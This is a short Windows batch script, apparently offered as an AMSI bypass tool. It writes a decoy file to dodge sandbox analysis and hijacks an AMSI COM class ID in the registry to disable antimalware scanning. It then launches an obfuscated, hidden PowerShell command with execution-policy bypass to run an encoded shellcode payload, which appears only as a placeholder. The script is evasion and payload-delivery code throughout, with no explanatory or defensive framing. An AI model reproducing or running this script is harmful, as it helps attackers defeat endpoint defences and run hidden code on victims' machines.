AMSI-bypass.bat

1. @echo off
2. :: Writte file to disk to evade sandbox detection
3. echo microsoft > %userprofile%\\license.pem
4. :: AMSI COM Bypass [ enigma0x3 ]
5. REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
6. REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
7. :: Sleep time to refresh regedit
8. sleep 3
9. :: local batch variable declarations
10. sEt !h=e&& sEt U7=n&& sEt k8=d&& sEt db=P
11. :: Powershell command obfuscated
12. @c^M%k8%.E"x"%!h% /c =%db%oW%!h%rS^h%!h%lL"."%!h%Xe -%U7%o%db% -W^I%U7% hI%k8%D%!h%%U7% -%!h%p By%db%a^S%AA%s -%!h%%U7% $ENCODED-SHELLCODE-BASE64
13. exit